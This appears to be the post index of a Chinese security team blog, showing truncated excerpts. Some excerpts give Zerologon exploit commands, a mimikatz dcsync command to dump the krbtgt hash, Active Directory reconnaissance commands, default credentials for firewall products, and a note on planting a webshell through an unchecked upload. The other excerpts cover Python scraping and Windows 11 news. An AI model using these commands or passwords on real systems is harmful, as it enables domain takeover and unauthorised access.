14x Security Team

展开菜单

关于CVE-2020-1472域渗透提权的一些常用命令

关于CVE-2020-1472域渗透提权的一些常用命令
关于CVE-2020-1472域渗透提权的一些常用命令工具下载地址:https://github.com/SecuraBV/CVE-2020-1472/archive/refs/heads/master.ziphttps://github.com/risksense/zerologonpython3 zerologon_tester.py WIN-2008-DC 192.168.3.123python3 set_empty_pw DC_NETBIOS_NAME DC_IP_A...

各类安全设备弱密码排查列表

各类安全设备弱密码排查列表
各类安全设备弱密码排查列表天融信防火墙 用户名:superman 密码:talent天融信防火墙 用户名:superman 密码:talent!23 联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766深信服防火墙 用户名:admin 密码:admin启明星辰 用户名:admin 密码:bane@7766 用户名:admin 密码:admin@123juniper 用户名:netscreen 密码:netscree...

关于域渗透Kerberos黄金票据的一些常用命令

关于域渗透Kerberos黄金票据的一些常用命令
关于域渗透Kerberos黄金票据的一些常用命令lsadump::dcsync的使用条件,获取以下任意一个用户权限:  1、Administrators 组  2、Domain Admins组  3、Enterprise Admins(企业管理员)组  4、域控制器的计算机账户mimikatz.exe "lsadump::dcsync /domain:x.com /user:krbtgt" > 2.txt ex...

关于域渗透白银票据MS14068一些常用命令

关于域渗透白银票据MS14068一些常用命令
关于域渗透白银票据MS14068一些常用命令渗透测试过程中,拿域控是常见的,也可能有的服务器没有域控常用命令如下:关于排查端口53,3389端口net time /domain 请求当前时间ipconfig /all配置文件nltest /DCLIST:test.com   多域控net group "Domain Controllers" /domainnet group "domain admins" /doma...

python re正则表达式抓取图片并下载

python re正则表达式抓取图片并下载
python re正则表达式抓取图片并下载import requestsimport reurl="http://www.x14hack.com/?id=388"response=requests.get(url)html=response.content.decode('utf-8')reSimg= '<img class="ue-image" src="(.*?)"'data...

python BeautifulSoup抓取新闻,标题内容

python BeautifulSoup抓取新闻,标题内容
python BeautifulSoup抓取新闻,标题内容# -*- coding:utf-8 -*-import requestsfrom bs4 import BeautifulSoupimport jsonres=requests.get('https://news.sina.com.cn/gov/xlxw/2021-12-08/doc-ikyamrmy7586727.shtml')res.encoding=('utf-8')soup =...

一次工作中getshell失败的linux提权尝试

一次工作中getshell失败的linux提权尝试
一次工作中getshell失败的linux提权尝试先检查了源代码,发现上传代码根本没有判断用户的上传类型发现ajax采用json数据传递data参数的时候,只要有数据,即可保存成功而且这个漏洞可能是通用意味着我们可以上传任何格式类型的脚本木马,如.php.jsp.php4.php5.aspx cer,关键点在于能否成功解析木马拿shell的过程就省略..我们可以去找找配置文件的数据 linux主机如conf,config之类的找了许久发现了数据连接密码,用find命令查找,f...

微软发布Windows11 首次支持下载使用安卓App

微软发布Windows11 首次支持下载使用安卓App
微软发布Windows11 首次支持下载使用安卓App6月25日,微软发布Windows11,首次将安卓应用程序引入Windows。此外,微软还凭借云技术,将多个功能与安卓、iOS系统内的内容与PC联接起来。据介绍,今年晚些时候,用户可以在Microsoft Store 中找到安卓应用程序,并可通过亚马逊应用商店下载。“想象一下,您可以在 TikTok 上录制并发布视频,或者在您的电脑上使用 Khan Academy Kids 进行线上学习。我们期待采用 Intel Brid...